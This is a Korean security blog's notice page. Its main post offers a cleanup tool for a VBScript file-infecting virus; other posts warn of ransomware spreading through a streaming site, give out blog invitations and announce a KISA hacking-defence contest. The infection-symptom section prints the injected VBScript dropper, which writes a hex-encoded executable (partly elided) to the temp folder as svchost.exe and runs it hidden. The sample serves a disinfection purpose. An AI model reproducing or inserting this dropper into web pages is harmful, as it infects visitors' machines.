'공지사항'에 해당되는 글 7건

파리떼 바이러스 치료 프로그램 (VBScript parite)

Posted by nopsled
2016.03.26 02:47 공지사항



antivirus.exe

 

일반 사용자용

 

antivirus.py


개발자용


주절주절

만들어 달라는 분이 계셔서 정말 간단하게 만든 python 파일입니다.. (py2exe로 사용해서 exe로 변환했구요. 스크립트 첨부했습니다.)

치료만 하실분들은 .exe파일을 받아서 실행하시면 됩니다. (개발자 분들 혹은 디버깅 용도로 사용하실 분들은 .py를 확인하시면 됩니다.)

* 상업적으로만 사용안하셨으면 하구요.(상업적으로 쓸일도 없겠지만..) CC만 남겨주신다면 수정/재배포 무한 가능합니다~




사용법

실행하셔서 치료하고 싶은 드라이버명 입력하면 됩니다.

예를 들자면.. C:\다 그러면 C:\입력하시구요. D:\다 싶으면 D:\입력하시면 됩니다.

C:\nopsled\909090\ 이렇게 입력하셔도 C:\드라이브 부터 치료합니다.. (예외처리 귀찮아서..)



감염증상

밑에는 감염되었을때 나타나는 문제인데 html에 DropFileName = "svchost.exe" 이런식으로 생기게 됩니다.

(관련 게시물 : http://nopsled.tistory.com/153)

</div>

</div>

</div>

</body>

</html><SCRIPT Language=VBScript><!--

DropFileName = "svchost.exe"

WriteData = "4D5A90000300000004000000FFFF0000B80000000000000(....생략...)F95F9C363906578B80B5C9859752AE1DA05373CC889E80EC04574FB962CB574250AE1DEB16216218D0B3DE2A130319B79A1F071CE22E927D3760119CD5BF41057C67998D1B0E50AE1DEC3C124811F5E29E65253614B7C9102724FE6FCF30324839EEE59F77574F03DEBB233731C24DD23C07493EE880EC523E3D21C2A83B033CC272C353737A34EEF499653B0927D2AC574250EB65C927235E32FFE59F77574F55F3BB362516C773C9201B2C5DCBE9824C322325E0C9574250AE1DA053732C000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"

Set FSO = CreateObject("Scripting.FileSystemObject")

DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName

If FSO.FileExists(DropPath)=False Then

Set FileObj = FSO.CreateTextFile(DropPath, True)

For i = 1 To Len(WriteData) Step 2

FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))

Next

FileObj.Close

End If

Set WSHshell = CreateObject("WScript.Shell")

WSHshell.Run DropPath, 0

//--></SCRIPT>

저작자 표시 비영리
신고

베이코리언즈 랜섬웨어 급승하는듯.

Posted by nopsled
2015.11.25 03:33 공지사항

베이코리언즈에서 랜섬웨어를 찾아낼 수 있는 껀덕지가 없다. 광고서버를 통해서 DBD(Drive By Download)되어서 실행되는 것 같은데 시연의 법칙인가.. 직접 이리저리 탐색해도 걸리지 않는다.-_-;;


무튼.. 유포되고 있는 랜섬웨어는 확장자를 ccc로 변경 및 파일 내용을 암호화 해버린다. (CryptoWall의 변종으로 보이고 있다.)


물론.. 당했다면 어쩔 수 없는 노릇이고.. 다음 피해자를 막기 위해서는 덧글이나 방명록에 어떤 방식으로 감염된건지(추측도 가능.), 언제 감염된건지 자세하게 기록 해주셨으면 합니다.


당분간 베이코리언즈 및 불법 동영상 스트리밍 서비스는 이용 중단할 것.


제보 및 발견 하는대로 분석하겠습니다.😊

저작자 표시 비영리
신고

Dear. foreigner.

Posted by nopsled
2015.11.02 09:59 공지사항



Hello, dear my visitors.


Many foreigner using google translate system. but google translator is unstable. So, you doing translate it and read it. if you feel difficult or not understand it, send to e-mail. i will help you. how to? read next message.


[how to send your question?]

1. attach post URL and what do you want at post(what is your purpose.)

2. fill 67sooon@naver.com in form.

3. send to me. 


I THINK... IM BETTER THAN TRANSLATOR. if you have any question, contact to 67sooon@naver.com. And if you have malware or suspicious binary file, zip it and send to my e-mail.


Thank you

Best regards,

저작자 표시 비영리
신고

티스토리 초대장 10장 배포합니다.

Posted by nopsled
2015.11.01 05:24 공지사항



  "이름/나이/블로그 카테고리/예전 블로그가 있다면 주소/티스토리 블로그 개설 목적"에 대해서 적어주시면 검토 후 초대해드리겠습니다. 작심 삼일이 아니라 잘 운영하실 분만 덧글 달아주셨으면 좋겠습니다.


  감사합니다.

저작자 표시 비영리
신고

백신에서 제 블로그를 탐지하여 차단하는 경우

Posted by nopsled
2015.10.25 13:11 공지사항




  특정 백신업체(AVG 등..)가 현재 제 블로그를 악성으로 탐지한다고 합니다. [탐지명 : JavaScript Obfuscation (type 2905)] 아마 이 문제는 본문에 자바 스크립트 난독화 샘플이 첨부 되어서 시그네이쳐 기반에 의한 탐지로 확인 되므로 걱정하지 않으셔도 됩니다. 또한, 여러번 블로그를 둘러 본 결과, 침해사고의 흔적 및 악성 스크립트 삽입의 흔적이 보이지 않습니다. 감사합니다.

저작자 표시 비영리
신고

티스토리 초대장 13장 배포합니다.

Posted by nopsled
2015.05.29 00:54 공지사항

제목과 동일한 내용이구요.


초대장이 자꾸 남아돌아서 지인 주기엔 너무 많고 원하는 사람도 없어서 공유합니다.


"이름/나이/블로그 카테고리/예전 블로그가 있다면 주소/티스토리 블로그 개설 목적"에 대해서 적어주시면 검토 후 초대해드리겠습니다.


참고로.. 광고용도, 파일공유 용도로 사용 하시는 분들에겐 공유 안하겠습니다.


감사합니다.

저작자 표시 비영리
신고

KISA 제11회 해킹방어대회(HDCON)

Posted by nopsled
2014.10.01 16:53 공지사항

★★★ 제11회 해킹방어대회(HDCON) 안내 ★★★

o 참가대상 : 국내 모든 정보보호 담당자, 화이트해커

(1개 팀당 4명 이하로 팀원 구성, 내국인으로 제한)

o 참가신청 : 2014. 10. 1(수) 09:00 ~ 2014. 10. 15(수) 18:00까지 

홈페이지를 통해 신청(http://hdcon.kisa.or.kr)

o 예선대회

- 1부 : 2014. 10. 18(토) 10:00 ~ 18:00 (8시간), 온라인 문제풀이

- 2부 : 2014. 10. 19(일) 10:00 ~ 20:00 (10시간), 온라인 실전 시뮬레이션(실시간 사고대응)

- 1부 예선결과 상위 100개팀이 2부 예선에 진출, 본선진출 10개팀 선정

o 본선대회

- 2014. 12. 4(목) 09:00 - 18:30 파티오나인 그레이스홀

- 가상망 내에서 발생하는 사고에 대한 실시간 사고대응. 취약점 대응, 침해시스템 분석, 시스템 가동율 유지 등 종합적으로 평가하여 순위 결정

o 참여 행사

- 일반인들을 대상으로 해킹/방어기술 실습, 우승팀 맞추기, 응원메시지 남기기, 퀴즈 이벤트 등을 온라인으로 진행

- 실시간 페이스북(https://www.facebook.com/hdcon), 트위터(@kisa_hdcon) 중계

o 시상내용

- 대상(미래창조과학부장관상) : 상금 1,000만원 및 상장(1팀)

- 금상(한국인터넷진흥원장상) : 상금 400만원 및 상장(2팀)

- 은상(한국인터넷진흥원장상) : 상금 200만원 및 상장(2팀)

참가신청 및 자세한 사항은 http://hdcon.kisa.or.kr 에서 참고하세요.




근무하고 있는 직장에서 제 11회 해킹방어대회를 연다고 하네요.


많은 참여 부탁드립니다. :D

저작자 표시 비영리
신고

티스토리 툴바